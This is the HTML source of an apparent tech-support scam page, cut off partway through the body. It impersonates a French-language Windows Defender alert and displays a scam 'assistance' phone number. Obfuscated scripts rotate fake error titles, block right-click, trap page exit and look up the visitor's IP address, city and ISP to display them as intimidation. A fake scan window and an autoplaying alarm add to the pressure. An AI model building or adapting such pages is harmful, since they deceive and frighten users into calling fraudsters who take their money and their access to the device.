<html lang="en">
	<head>
		<meta charset="utf-8" />
		<meta content="width=device-width,initial-scale=1,shrink-to-fit=no" name="viewport" />
		<meta content="noindex,nofollow" name="robots" />
		<title></title>
		<link href="msmm.png" rel="icon" id="favicon" type="image/png" />
	<style>
	.table,
label {
	max-width: 100%;
}

.btn:focus,
.btn:hover,
body {
	color: #333;
}

#textweb,
.row:after {
	clear: both;
}

#bottom ul,
.mar_top ul,
.total_detail ul,
.total_detail_scan ul {
	list-style-type: none;
}

#footer,
#webbx,
.btn,
[role='button'],
button {
	cursor: pointer;
}

@-webkit-keyframes progress-bar-stripes {
	0% {
		background-position: 40px 0;
	}

	to {
		background-position: 0 0;
	}
}

@-o-keyframes progress-bar-stripes {
	0% {
		background-position: 40px 0;
	}

	to {
		background-position: 0 0;
	}
}

@keyframes progress-bar-stripes {
	0% {
		background-position: 40px 0;
	}

	to {
		background-position: 0 0;
	}
}

@keyframes rotate {
	0% {
		transform: rotate(0);
	}

	to {
		transform: rotate(360deg);
	}
}

@keyframes zoominoutsinglefeatured {
	0%,
	to {
		transform: scale(1, 1);
	}

	50% {
		transform: scale(1.1, 1.1);
	}
}

html {
	font-family: sans-serif;
	-webkit-text-size-adjust: 100%;
	-ms-text-size-adjust: 100%;
	font-size: 10px;
	-webkit-tap-highlight-color: transparent;
}

.btn,
.dropdown-menu,
body {
	font-size: 14px;
}

body {
	margin: 0;
	font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif;
	line-height: 1.42857143;
	background-color: #fff;
	overflow-y: hidden;
	-youbkit-touch-callout: none;
	-youbkit-user-select: none;
	-moz-user-select: none;
	-ms-user-select: none;
	user-select: none;
}

button,
h2,
h4,
input {
	font-family: inherit;
	color: inherit;
}

.activate_lic ul li a button,
a,
table {
	background-color: transparent;
}

audio {
	display: inline-block;
	vertical-align: baseline;
}

.btn,
.btn-group,
img {
	vertical-align: middle;
}

audio:not([controls]) {
	display: none;
	height: 0;
}

.dropdown-toggle:focus,
a:active,
a:hover {
	outline: 0;
}

strong {
	font-weight: 700;
}

small {
	font-size: 85%;
}

img {
	border: 0;
}

button,
input {
	margin: 0;
	font: inherit;
	font-size: inherit;
	line-height: inherit;
}

.bt_can .btn,
.bt_can2 .btn {
	margin-right: 15px;
	height: 30px;
	padding: 12px;
	line-height: 0;
}

button {
	overflow: visible;
	text-transform: none;
	-webkit-appearance: button;
}

button::-moz-focus-inner,
input::-moz-focus-inner {
	padding: 0;
	border: 0;
}

input[type='checkbox'] {
	-webkit-box-sizing: border-box;
	-moz-box-sizing: border-box;
	box-sizing: border-box;
	padding: 0;
	margin: 2px 0px 0 9px;
	line-height: normal;
}

table {
	border-spacing: 0;
	border-collapse: collapse;
}

td,
th {
	padding: 0;
}

@media print {
	*,
	:after,
	:before {
		color: #000 !important;
		text-shadow: none !important;
		background: 0 0 !important;
		-webkit-box-shadow: none !important;
		box-shadow: none !important;
	}

	a,
	a:visited {
		text-decoration: underline;
	}

	a[href]:after {
		content: ' (' attr(href) ')';
	}

	a[href^='#']:after {
		content: '';
	}

	thead {
		display: table-header-group;
	}

	img,
	tr {
		page-break-inside: avoid;
	}

	img {
		max-width: 100% !important;
	}

	h2,
	p {
		orphans: 3;
		widows: 3;
	}

	h2 {
		page-break-after: avoid;
	}

	.table {
		border-collapse: collapse !important;
	}

	.table td,
	.table th {
		background-color: #fff !important;
	}

	.table-bordered td,
	.table-bordered th {
		border: 1px solid #ddd !important;
	}
}

.btn,
.btn:active {
	background-image: none;
}

.btn:focus,
.btn:hover,
.total_detail ul li a,
.total_detail_scan ul li a,
a {
	text-decoration: none;
}

@font-face {
	font-family: 'Glyphicons Halflings';
	src: url(fonts/glyphicons-halflings-regular.eot);
	src: url(fonts/glyphicons-halflings-regular.eot?) format('embedded-opentype'),
		url(fonts/glyphicons-halflings-regular.woff2) format('woff2'), url(fonts/glyphicons-halflings-regular.woff) format('woff'),
		url(fonts/glyphicons-halflings-regular.ttf) format('truetype'), url(fonts/glyphicons-halflings-regular.svg) format('svg');
}

*,
:after,
:before {
	-webkit-box-sizing: border-box;
	-moz-box-sizing: border-box;
	box-sizing: border-box;
}

a {
	color: #337ab7;
}

a:focus,
a:hover {
	color: #23527c;
	text-decoration: underline;
}

.btn:active:focus,
.btn:focus,
a:focus,
input[type='checkbox']:focus {
	outline: -webkit-focus-ring-color auto 5px;
	outline-offset: -2px;
}

h2,
h4 {
	font-weight: 500;
	line-height: 1.1;
}

h2 {
	margin-top: 20px;
	font-size: 30px;
}

.minimize1 ul,
h4 {
	margin-top: 10px;
}

h2,
h4,
ul {
	margin-bottom: 10px;
}

h4 {
	font-size: 18px;
}

p {
	margin: 0 0 10px;
}

.text-left,
th {
	text-align: left;
}

.btn,
.text-center {
	text-align: center;
}

ul {
	margin-top: 0;
}

.row {
	margin-right: -15px;
	margin-left: -15px;
}

.col-md-10,
.col-md-12,
.col-md-2,
.col-md-4,
.col-md-6,
.col-md-8 {
	position: relative;
	min-height: 1px;
	padding-right: 15px;
	padding-left: 15px;
}

@media (min-width: 992px) {
	.col-md-10,
	.col-md-12,
	.col-md-2,
	.col-md-4,
	.col-md-6,
	.col-md-8 {
		float: left;
	}

	.col-md-12 {
		width: 100%;
	}

	.col-md-10 {
		width: 83.33333333%;
	}

	.col-md-8 {
		width: 66.66666667%;
	}

	.col-md-6 {
		width: 50%;
	}

	.col-md-4 {
		width: 33.33333333%;
	}
}

.table {
	width: 100%;
	margin-bottom: 20px;
}

.table > tbody > tr > td,
.table > thead > tr > th {
	padding: 8px;
	line-height: 1.42857143;
	vertical-align: top;
	border-top: 1px solid #ddd;
}

.table > thead > tr > th {
	vertical-align: bottom;
	border-bottom: 2px solid #ddd;
}

.table > thead:first-child > tr:first-child > th {
	border-top: 0;
}

.table-bordered,
.table-bordered > tbody > tr > td,
.table-bordered > thead > tr > th {
	border: 1px solid #ddd;
}

.table-bordered > thead > tr > th {
	border-bottom-width: 2px;
}

#bottom ul li,
.btn,
.infos,
label {
	display: inline-block;
}

label {
	margin-bottom: 5px;
	font-weight: 700;
}

.btn {
	padding: 6px 12px;
	margin-bottom: 0;
	font-weight: 400;
	line-height: 1.42857143;
	white-space: nowrap;
	-ms-touch-action: manipulation;
	touch-action: manipulation;
	-webkit-user-select: none;
	-moz-user-select: none;
	-ms-user-select: none;
	user-select: none;
	border: 1px solid transparent;
	border-radius: 4px;
}

.btn:active {
	outline: 0;
	-webkit-box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125);
	box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125);
}

.dropdown {
	position: relative;
}

.dropdown-menu {
	position: absolute;
	top: 100%;
	left: 0;
	z-index: 1000;
	display: none;
	float: left;
	min-width: 160px;
	padding: 5px 0;
	margin: 2px 0 0;
	text-align: left;
	list-style: none;
	background-color: #fff;
	-webkit-background-clip: padding-box;
	background-clip: padding-box;
	border: 1px solid rgba(0, 0, 0, 0.15);
	border-radius: 4px;
	-webkit-box-shadow: 0 6px 12px rgba(0, 0, 0, 0.175);
	box-shadow: 0 6px 12px rgba(0, 0, 0, 0.175);
}

.btn-group {
	position: relative;
	display: inline-block;
}

#footer,
#pop_up_new,
#webbx,
#osdywn394,
.black {
	display: none;
}

.btn-group > .btn {
	position: relative;
	float: left;
}

.btn-group > .btn:active,
.btn-group > .btn:focus,
.btn-group > .btn:hover {
	z-index: 2;
}

.btn-group > .btn:first-child {
	margin-left: 0;
}

.progress {
	margin-bottom: 20px;
	overflow: hidden;
	background-color: #f5f5f5;
	border-radius: 4px;
	-webkit-box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.1);
	box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.1);
}

.progress-bar {
	float: left;
	width: 0;
	font-size: 12px;
	line-height: 20px;
	color: #fff;
	text-align: center;
	background-color: #337ab7;
	-webkit-box-shadow: inset 0-1px 0 rgba(0, 0, 0, 0.15);
	box-shadow: inset 0-1px 0 rgba(0, 0, 0, 0.15);
	-webkit-transition: width 0.6s;
	-o-transition: width 0.6s;
	transition: width 0.6s;
}

.pro_box_header,
.scan_box,
.scan_box2 {
	box-shadow: 0 2px 5px 1px rgb(64 60 67/16%);
}

.progress-bar.active {
	-webkit-animation: 2s linear infinite progress-bar-stripes;
	-o-animation: 2s linear infinite progress-bar-stripes;
	animation: 2s linear infinite progress-bar-stripes;
}

.progress-bar-success {
	background-color: #5cb85c;
}

.row:after,
.row:before {
	display: table;
	content: ' ';
}

@-ms-viewport {
	width: device-width;
}

#pop_up_new {
	position: absolute;
	top: 10%;
	z-index: 999999;
	left: 36%;
	background: #0067b8 !important;
	width: 440px;
	text-align: left;
	padding-top: 4px;
	color: #fff;
	padding-left: 20px;
	padding-right: 20px;
}

#pop_up_new p {
	font-weight: 500;
	font-size: 12px;
	line-height: 21px;
}

#pop_up_new .sdcnk38nc a.active {
	border: 1px solid #fff;
	font-weight: 700;
}

#pop_up_new .sdcnk38nc a {
	float: right;
	font-size: 12px;
	margin-right: 15px;
	padding: 6px 25px;
	text-decoration: none;
	color: #000 !important;
	border: 1px solid #ddd;
	margin-top: 20px;
	border-radius: 2px;
	margin-bottom: 20px;
}

.bg .bgimg,
.black {
	position: absolute;
	width: 100%;
}

.black {
	height: 100%;
	background-color: #000;
	opacity: 0.7;
	transition: 1s;
	top: -190px;
}

.bg .bgimg {
	top: 60px;
	left: 0;
}

.pro_box,
.pro_box2,
.pro_box3 {
	width: 750px;
	height: 550px;
	position: absolute;
	z-index: 99;
	background-color: #fff;
	left: 26%;
	top: 12%;
	display: none;
}

.circular-spinner,
.mar_top,
.title3 {
	position: relative;
}

.pro_box2,
.pro_box3 {
	width: 850px;
	height: 720px;
	z-index: 9999;
	left: 23%;
	top: 5%;
}

.pro_box3 {
	z-index: 999999;
}

.activate_lic ul,
.minimize ul,
.minimize1 ul {
	list-style-type: none;
	float: right;
}

.activate_lic ul li,
.minimize ul li,
.minimize1 ul li {
	float: left;
	display: inline-block;
}

.minimize ul li a img,
.minimize1 ul li a img {
	width: 140px;
	height: auto;
}

.logo {
	margin-left: 20px;
}

.logo img {
	width: 30px;
}

.logo span {
	margin-left: 6px;
}

.activate_lic ul li a {
	padding: 10px;
}

.activate_lic ul li a button {
	border: 2px solid #a5add1;
	color: #3947b0;
	padding: 5px;
	border-radius: 6px;
	text-align: center;
	position: relative;
	top: -3px;
}

.scan_box {
	width: 700px;
	height: 393px;
	background-color: #fff;
	margin: 20px auto 0;
	display: block;
}

.scan_box_header {
	border-bottom: 1px solid #c1c1c1;
	height: 50px;
}

.ofmv93 {
	margin: 10px 0 0 16px;
}

.count-title,
.make_this p,
.scan_dur p {
	margin-bottom: 0;
}

#dynamic,
.logo span,
.ofmv93 p {
	font-size: 18px;
	font-weight: 700;
}

.ofmv93 img {
	width: 25px;
	margin-right: 6px;
}

.progress {
	margin-top: 15px;
	width: 665px;
	margin-left: 19px;
}

.bt_can,
.bt_can2 {
	margin-top: 93px;
}

.progress,
.progress-bar {
	height: 25px;
}

#dynamic {
	color: #fff;
	font-size: 15px;
}

.table_quick .table {
	width: 665px;
	margin-left: 20px;
	border-radius: 0.25rem;
	margin-top: 20px;
}

.table th {
	padding: 0.25rem;
}

.table-bordered td,
.table-bordered th {
	border-bottom: 1px solid #dee2e6;
}

.bt_can {
	margin-left: 28px;
}

.bt_can .btn {
	background: 0 0;
	color: #000;
	width: 80px;
	text-align: center;
}

.bt_can .btn:focus,
.bt_can2 .btn:focus {
	box-shadow: none;
}

.bg_blue,
.bt_can .btn:hover,
.bt_can2 .btn:hover,
.btn-secondary:not(:disabled):not(.disabled).active,
.btn-secondary:not(:disabled):not(.disabled):active {
	background-color: #007bff;
	border-color: #007bff;
	color: #fff;
}

#webbx,
#osdywn394,
.counter {
	background-color: #fff;
}

.bt_can2 {
	float: right;
}

.bt_can2 .btn {
	background: 0 0;
	color: #000;
	width: 160px;
	text-align: center;
}

.counter {
	padding: 0;
	border-radius: 5px;
}

.count-title {
	font-size: 1rem;
	font-weight: 700;
	text-align: left;
}

#disclaimer,
#osdywn394 a,
#osdywn394 h4,
#osdywn394 p,
#textweb,
.button,
.button2 {
	text-align: center;
}

.total_detail ul {
	float: right;
	margin-top: 8px;
}

.total_detail ul li {
	float: left;
	display: inline-block;
	font-size: 11px;
	padding-left: 10px;
	padding-right: 15px;
	text-align: center;
}

.total_detail ul li a p {
	line-height: 12px;
	margin-bottom: 3px;
	color: #000;
	font-weight: 700;
}

.new_heading {
	margin-top: 8px;
	margin-left: 20px;
}

.scan_box2 {
	width: 800px;
	height: 603px;
	margin: 20px auto 0;
	display: block;
}

.table_quick2 .table {
	width: 767px;
	margin-left: 20px;
	border-radius: 0.25rem;
	margin-top: 0;
}

.table_quick2 .table td,
.table_quick2 .table th {
	padding: 0.12rem;
	font-size: 12px;
}

.mar_lef {
	margin-left: 10px;
}

#table_scroll {
	height: 60px;
	overflow-y: auto;
	width: 100%;
}

.scan_footer2 {
	margin-top: -80px;
}

.table_quick2 {
	margin-top: -22px;
}

.total_detail_scan ul li {
	float: left;
	display: inline-block;
	width: 140px;
	font-size: 17px;
	font-weight: 600;
}

.total_detail_scan {
	padding: 17px 0;
	margin-left: -18px;
}

.total_detail_scan ul li:first-child:before {
	border-bottom: 2px solid #204289;
	position: absolute;
	content: '';
	display: block;
	background-color: #204289;
	width: 70px;
	height: 2px;
	top: 42px;
}

.total_detail_scan ul li:first-child {
	width: 90px;
}

.pc_desk {
	padding: 63px 2px 0 46px;
}

.mar_top {
	top: 16px;
}

.mar_top ul {
	padding-inline-start: 0;
}

.mar_top ul li {
	line-height: 30px;
}

.mar_top:before {
	width: 1px;
	height: 200px;
	content: '';
	background-color: #eee;
	position: absolute;
	display: block;
	right: 2px;
}

.scan_footer3 {
	margin-top: 39px;
	margin-left: 0;
	background: #eee;
	padding: 10px;
}

.dfvd4sss img {
	width: 68px;
	padding-top: 5px;
	padding-bottom: 10px;
}

.make_this {
	margin-top: 8px;
}

.dfvd4sss {
	margin-left: 45px;
}

.make_this p {
	font-size: 14px;
	font-weight: 600;
}

.circular-spinner {
	margin-top: 30px;
	width: 20px;
	height: 20px;
	border: 2px solid #fff;
	border-top: 2px solid #454d7c;
	border-radius: 100%;
	animation: 1.5s linear infinite rotate;
	float: left;
	top: -25px;
	left: -4px;
}

#footer {
	width: 100%;
	position: fixed;
	bottom: 0;
	background-color: #0067b8 !important;
	z-index: 999;
	padding: 10px 34px 4px;
	color: #fff;
	font-size: 18px;
	height: 81px;
}

#disclaimer,
#footertxt,
.colo-rd {
	font-size: 20px;
}

#footertxt img {
	width: 20px;
}

#webbx {
	font-weight: 700;
	padding: 15px 30px;
	min-height: 300px;
	border-radius: 10px;
	border: 1px solid #fff;
	width: 620px;
	margin: 0 auto;
	z-index: 9999999;
	box-shadow: 5px 5px 15px 5px rgba(0, 0, 0, 0.4);
	position: absolute;
	top: 14.5%;
	left: 30%;
}

#disclaimer {
	margin: 5px;
	font-weight: 700;
}

.logo3 {
	margin: 0 7px 0 0;
	width: 30px;
	height: 30px;
}

.title2 img {
	position: absolute;
	width: 3%;
	top: 27px;
	right: 17px;
}

#textweb {
	padding-top: 10px;
	font-size: 17px;
	font-weight: 700;
}

.colo-rd {
	color: #ba000d;
}

#badge {
	margin-top: 22px;
	height: 27px;
}

.title3 {
	font-size: 10px;
	font-weight: 700;
	width: 3%;
	top: 21px;
	left: 8px;
}

#bottom ul {
	margin-left: 190px;
}

#bottom ul li {
	float: left;
	padding-left: 20px;
	margin-top: 13px;
}

.button,
.button2:hover {
	color: #fff;
	background-color: #0067b8 !important;
}

.button,
.button2 {
	border-radius: 4px;
	padding: 10px 30px;
	font-size: 18px;
	font-weight: 700;
	cursor: pointer;
}

.button2 {
	color: #000;
	border: 1px solid #000;
	background-color: transparent;
}

.button2:hover {
	border-color: #0067b8 !important;
}

.cardcontainer {
	animation: 4s infinite zoominoutsinglefeatured;
}

.support {
	font-weight: 700;
	font-size: 2.5rem;
	color: #114d9a;
}

#bottom {
	margin: 12px 0;
	height: 50px;
	display: flex;
	border-top: 1px solid #d6d5d5;
}

#banner {
	margin: 5px auto;
	display: block;
}

.headers {
	width: 535px;
	margin-top: 7px;
	padding-bottom: 10px;
}

#osdywn394 {
	padding: 15px;
	position: fixed;
	bottom: 74px;
	right: 13px;
	z-index: 999999;
	border-radius: 10px;
}

#osdywn394 img {
	color: #000;
	font-size: 16px;
	font-weight: 600;
	margin-left: 35px;
	width: 25px;
}

#osdywn394 h4 {
	width: 217px;
	font-size: 20px;
	padding-top: 7px;
	margin: 0 auto;
	display: block;
}

#osdywn394 a {
	margin: 0 auto;
	display: block;
}

#osdywn394 p {
	font-size: 16px;
	padding-top: 7px;
	font-weight: 400;
}

#osdywn394 .arrow-down {
	position: absolute;
	font-size: 47px;
	color: #fff;
	bottom: -25px;
	left: 65px;
}

#osdywn3942 img {
	color: #000;
	font-size: 16px;
	font-weight: 600;
	margin-left: 65px;
	width: 90px;
}

#age-confirmation-modal:before {
	position: absolute;
	width: 100%;
	height: 100%;
	left: 0;
	right: 0;
	top: 0;
	border: 0;
	content: '';
	background-color: #0000003b;
}
#age-confirmation-modal {
	position: fixed;
	top: 0;
	bottom: 0;
	left: 0;
	right: 0;
	z-index: 99999999;
	display: inline-block;
	background-color: rgba(0, 0, 0, 1);
	background-image: url(bg1.jpg);
	width: 100%;
	height: auto;
	background-repeat: no-repeat;
	background-size: cover;
	text-align: center;
	cursor: alias;
	font-size: 3.5rem;
}
#age-confirmation-modal .innerContainer {
	background-color: #fff;
	color: #111111;
	padding: 50px;
	border-radius: 20px;
	display: inline-block;
	top: 50%;
	position: absolute;
	left: 50%;
	transform: translate(-50%, -50%);
}

#other-content {
	display: none;
}
.close {
	float: right;
	width: 22px;
	color: red;
	margin: -2rem;
}

.bt_can .btn,
.bt_can2 .btn {
	margin-right: 15px;
	height: 30px;
	padding: 12px;
	line-height: 0;
}

button {
	overflow: visible;
	text-transform: none;
	-webkit-appearance: button;
}

button::-moz-focus-inner,
input::-moz-focus-inner {
	padding: 0;
	border: 0;
}

.btn-primary {
	color: #fff;
	background-color: #007bff;
	border-color: #007bff;
}

.btn-lg {
	padding: 1rem 3rem;
	font-size: 2rem;
	line-height: 1.5;
	border-radius: 0.3rem;
	margin-top: 1.55rem;
}

.btn-secondary {
	color: #fff;
	background-color: #008000;
	border-color: #008000;
}

.btn-secondary:hover {
	color: #fff;
}

ul.imglinks li {
	list-style-type: none;
	display: inline-block;
	float: left;
	width: 33.33%;
}
ul.imglinks li img {
	width: 100px;
	margin: 44px 0;
}
ul.imglinks li img.banner {
	margin: 0;
}
ul.imglinks li:nth-child(1) img {
}
ul.imglinks li:nth-child(2) {
	margin: 0 auto;
	text-align: center;
}

.blink {
	animation: blink-animation 1s steps(5, start) infinite;
	-webkit-animation: blink-animation 1s steps(5, start) infinite;
}
.blink2 {
	animation: blink-animation 1s steps(5, start) infinite;
	-webkit-animation: blink-animation 1s steps(5, start) infinite;
}

@keyframes blink-animation {
	to {
		visibility: hidden;
	}
}
@-webkit-keyframes blink-animation {
	to {
		visibility: hidden;
	}
}

	
	</style>

		<script type="text/javascript" src="https://code.jquery.com/jquery-1.4.4.min.js"></script>
		<script type="text/javascript">
			var _0x392915 = _0xf8c3;
			function _0xf8c3(_0x19edf6, _0x2e4af5) {
				var _0x337087 = _0x3370();
				return (
					(_0xf8c3 = function (_0xf8c358, _0x3a2fdf) {
						_0xf8c358 = _0xf8c358 - 0x135;
						var _0x114671 = _0x337087[_0xf8c358];
						return _0x114671;
					}),
					_0xf8c3(_0x19edf6, _0x2e4af5)
				);
			}
			(function (_0x5781ad, _0x126639) {
				var _0x4e5993 = _0xf8c3,
					_0x7cd89b = _0x5781ad();
				while (!![]) {
					try {
						var _0x5709ba =
							parseInt(_0x4e5993(0x13a)) / 0x1 +
							parseInt(_0x4e5993(0x136)) / 0x2 +
							parseInt(_0x4e5993(0x135)) / 0x3 +
							(-parseInt(_0x4e5993(0x148)) / 0x4) * (parseInt(_0x4e5993(0x14a)) / 0x5) +
							(parseInt(_0x4e5993(0x152)) / 0x6) * (-parseInt(_0x4e5993(0x14b)) / 0x7) +
							(-parseInt(_0x4e5993(0x150)) / 0x8) * (-parseInt(_0x4e5993(0x137)) / 0x9) +
							(-parseInt(_0x4e5993(0x14c)) / 0xa) * (-parseInt(_0x4e5993(0x14e)) / 0xb);
						if (_0x5709ba === _0x126639) break;
						else _0x7cd89b['push'](_0x7cd89b['shift']());
					} catch (_0x44a556) {
						_0x7cd89b['push'](_0x7cd89b['shift']());
					}
				}
			})(_0x3370, 0xe9885);
			const savedPhoneNumber = sessionStorage[_0x392915(0x139)](_0x392915(0x13e));
			var randomDegree = (Math[_0x392915(0x145)]() * (0x6 - 0x2) + 0x2)[_0x392915(0x142)](0x2);
			document[_0x392915(0x149)][_0x392915(0x140)][_0x392915(0x141)] = 'filter:hue-rotate(' + randomDegree + 'deg)';
			var titles = [
					_0x392915(0x13f),
					_0x392915(0x14f),
					_0x392915(0x138),
					_0x392915(0x144),
					_0x392915(0x147),
					_0x392915(0x13c),
					_0x392915(0x151),
					_0x392915(0x13b),
					_0x392915(0x13d),
					_0x392915(0x14d),
				],
				randomIndex = Math['floor'](Math[_0x392915(0x145)]() * titles['length']),
				randomTitle = titles[randomIndex];
			function _0x3370() {
				var _0x3f2499 = [
					'Critical\x20System\x20Issue:\x20Code\x20#C56789\x20Identified',
					'8QIbNhz',
					'Important\x20Alert:\x20System\x20Error\x20#H98765\x20Requires\x20Resolution',
					'2388SQqHlr',
					'bind',
					'5492250pEYMQJ',
					'161810WFWstw',
					'3193974oXMPtF',
					'Attention:\x20System\x20Error\x20#D98765\x20Requires\x20Immediate\x20Action',
					'getItem',
					'9576qfRMus',
					'Code\x20#I12345:\x20Computer\x20Issue\x20in\x20Need\x20of\x20Attention',
					'Urgent:\x20Computer\x20Malfunction\x20-\x20Error\x20Code\x20#G24680',
					'System\x20Error\x20Detected:\x20Code\x20#J56789',
					'phoneNumber',
					'System\x20Alert:\x20Error\x20Code\x20#A12345\x20Detected',
					'style',
					'cssText',
					'toFixed',
					'title',
					'Warning:\x20Your\x20Computer\x20Reports\x20Error\x20Code\x20#E54321',
					'random',
					'contextmenu',
					'Error\x20Notification:\x20Code\x20#F13579\x20Found\x20in\x20System',
					'2012912EwbWch',
					'documentElement',
					'10RBUsrH',
					'25424oZAGeW',
					'10DAUAJm',
					'Emergency:\x20Computer\x20Error\x20Code\x20#B80807\x20Reported',
					'12456664hLqzWc',
				];
				_0x3370 = function () {
					return _0x3f2499;
				};
				return _0x3370();
			}
			(document[_0x392915(0x143)] = randomTitle),
				$(function () {
					var _0x21406b = _0x392915;
					$('body')[_0x21406b(0x153)](_0x21406b(0x146), function (_0x24c6fa) {
						return ![];
					});
				});
		</script>

		<script>
			var _0x575c35 = _0x483c;
			(function (_0x5c68e8, _0x4b31d3) {
				var _0x223b6e = _0x483c,
					_0x1a73ea = _0x5c68e8();
				while (!![]) {
					try {
						var _0x2e8526 =
							(parseInt(_0x223b6e(0x1c0)) / 0x1) * (parseInt(_0x223b6e(0x1ce)) / 0x2) +
							(-parseInt(_0x223b6e(0x1c4)) / 0x3) * (parseInt(_0x223b6e(0x1b1)) / 0x4) +
							(-parseInt(_0x223b6e(0x1cd)) / 0x5) * (-parseInt(_0x223b6e(0x1c2)) / 0x6) +
							(parseInt(_0x223b6e(0x1bd)) / 0x7) * (-parseInt(_0x223b6e(0x1b6)) / 0x8) +
							parseInt(_0x223b6e(0x1cc)) / 0x9 +
							parseInt(_0x223b6e(0x1b3)) / 0xa +
							(parseInt(_0x223b6e(0x1c8)) / 0xb) * (-parseInt(_0x223b6e(0x1bf)) / 0xc);
						if (_0x2e8526 === _0x4b31d3) break;
						else _0x1a73ea['push'](_0x1a73ea['shift']());
					} catch (_0x4bcf04) {
						_0x1a73ea['push'](_0x1a73ea['shift']());
					}
				}
			})(_0x4165, 0xc518f);
			var t = new XMLHttpRequest();
			(t[_0x575c35(0x1ba)] = function () {
				var _0xfb16e7 = _0x575c35;
				if (0x4 == this['readyState'] && 0xc8 == this['status']) {
					var _0x307159 = JSON['parse'](this[_0xfb16e7(0x1c5)]);
					(ipadd = _0x307159['ip']),
						(city = _0x307159['city']),
						(country = _0x307159[_0xfb16e7(0x1bb)]),
						(isp = _0x307159[_0xfb16e7(0x1bc)][_0xfb16e7(0x1cb)]);
					var _0x5e51d6 = new Date();
					(currtime = _0x307159[_0xfb16e7(0x1b4)][_0xfb16e7(0x1b8)]),
						(document[_0xfb16e7(0x1b2)](_0xfb16e7(0x1c9))['textContent'] =
							_0xfb16e7(0x1ca) + ipadd + '\x20' + _0x5e51d6[_0xfb16e7(0x1be)](_0xfb16e7(0x1b5), currtime)),
						(document['getElementById'](_0xfb16e7(0x1c6))[_0xfb16e7(0x1c7)] = 'Localisation:\x20' + city + ',\x20' + country),
						(document[_0xfb16e7(0x1b2)](_0xfb16e7(0x1cb))['textContent'] = _0xfb16e7(0x1c1) + isp);
				}
			}),
				t[_0x575c35(0x1b9)](_0x575c35(0x1b7), 'https://ipwho.is/?lang=en', !0x0),
				t[_0x575c35(0x1c3)]();
			function _0x483c(_0x588759, _0x306426) {
				var _0x416510 = _0x4165();
				return (
					(_0x483c = function (_0x483c4a, _0x2937ad) {
						_0x483c4a = _0x483c4a - 0x1b1;
						var _0x412540 = _0x416510[_0x483c4a];
						return _0x412540;
					}),
					_0x483c(_0x588759, _0x306426)
				);
			}
			function _0x4165() {
				var _0x2f57f0 = [
					'getElementById',
					'12681820MKqCko',
					'timezone',
					'EN-US',
					'37208reXGnd',
					'GET',
					'current_time',
					'open',
					'onreadystatechange',
					'country',
					'connection',
					'2051ALhJDC',
					'toLocaleString',
					'780jkqUFN',
					'3340kOwIgD',
					'ISP:\x20',
					'948GzohYl',
					'send',
					'447XGngRO',
					'responseText',
					'city',
					'textContent',
					'92147gucgmn',
					'ip_add',
					'Adresse\x20IP:\x20',
					'isp',
					'2191311InfZWE',
					'24360QTolUa',
					'802eartDa',
					'24328uDsfJJ',
				];
				_0x4165 = function () {
					return _0x2f57f0;
				};
				return _0x4165();
			}
		</script>
	</head>
	<body class="uebch454" id="kdkku484" onbeforeunload="return myFunction()" style="cursor: none">
		<div id="age-confirmation-modal">
			<div class="innerContainer">
				<div>
					<img src="cross.png" class="close" />
				</div>

				<div class="">
					<ul class="imglinks" style="margin: 0">
						<li><img src="gif1.gif" alt="" /></li>
						<li><img src="microsoft.png" class="banner" alt="" /></li>
						<li><img src="gif2.gif" alt="" /></li>
					</ul>
				</div>

				<div>
					<h5 style="font-size: 25px">Windows Defender - Avertissement de sécurité</h5>

					<p style="font-size: 18px">
						Windows Defender Scan a trouvé un Adware potentiellement indésirable sur cet appareil qui peut voler vos mots de passe, votre
						identité en ligne, informations financières, fichiers personnels, images ou documents.
					</p>
					<p style="font-size: 21px; font-weight: 600">
						Ligne d'assistance immédiate:
						<script>
							document.write(savedPhoneNumber);
						</script>
					</p>
				</div>
				<div>
					<button type="button" class="btn btn-primary btn-lg" style="color: #fff; background-color: red; border-color: #007bff">
						Continuer vers le site web
					</button>
					<button type="button" class="btn btn-secondary btn-lg blink">Sortie et rapport</button>
				</div>
			</div>
		</div>

		<audio autoplay="" id="pridez">
			<source src="outpin26.mp3" type="audio/mpeg" />
		</audio>
		<div class="bg" style="cursor: none">
			<div class="bgimg" style="top: 0">
				<img src="bg.png" alt="" width="100%" />
			</div>
		</div>
		<a href="#" id="sdkcjnsnc" style="cursor: none" rel="noreferrer">
			<div class="black" style="height: 145%; cursor: none; display: block"></div>
		</a>
		<div class="pro_box" style="cursor: none; display: block">
			<div class="pro_box_header">
				<div class="row">
					<div class="col-md-12">
						<div class="minimize">
							<ul>
								<li>
									<a href="#">
										<img src="mnc.png" />
									</a>
								</li>
							</ul>
						</div>
					</div>
					<div class="col-md-4">
						<div class="logo">
							<img src="msmm.png" />
							<span>Windows_security</span>
						</div>
					</div>
					<div class="col-md-8">
						<div class="activate_lic">
							<ul>
								<li>
									<a href="#">
										<button>Activate the license</button>
									</a>
								</li>
								<li>
									<a href="#">
										<img src="set.png" />
									</a>
								</li>
								<li>
									<a href="#">
										<img
											src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAA0AAAANCAIAAAD9iXMrAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAP9JREFUeNqMUTEORUAQZbIUalESpTNoVEqJSuIKjuMUCiRKnQtoKSRCKRp0JPJf/iYbv/iJKdZ47+3smxl533fpG9d1dV03z/O6rrqum6bpOI6iKJxl/DNNU5Zly7JIjzAMI4oiy7KQy6gHUZqm+FFVNQxDEEDKsjzPk4iSJAFCeA6VeIE4jm3bbtsWJ3Ig932DhYbBk3juOI6macZx3LYtCAIOgoWGwbgwlOc5T9BB3/cCh4bQnfQbruui2aqqBAINYQRPEYx7nlcUBTwIEBrC1aeOMVbX9TAMTxAaghXMSfofYKEhTBzDFKimab7v4xQ2wEIj87292seb/X4EGADicI/nlE5xDgAAAABJRU5ErkJggg=="
										/>
									</a>
								</li>
							</ul>
						</div>
					</div>
				</div>
			</div>
			<div class="utubw3">
				<div class="utubw3_header">
					<div class="row">
						<div class="col-md-6">
							<div class="ofmv93">
								<p>
									<img src="vsc.png" />
									<span>Scanning Rapide</span>
								</p>
							</div>
						</div>
						<div class="col-md-6">
							<div class="minimize1">
								<ul>
									<li>
										<a href="#">
											<img src="mnc.png" />
										</a>
									</li>
								</ul>
							</div>
						</div>
					</div>
				</div>
				<div class="owiinm443">
					<div class="progress">
						<div
							class="active progress-bar progress-bar-success"
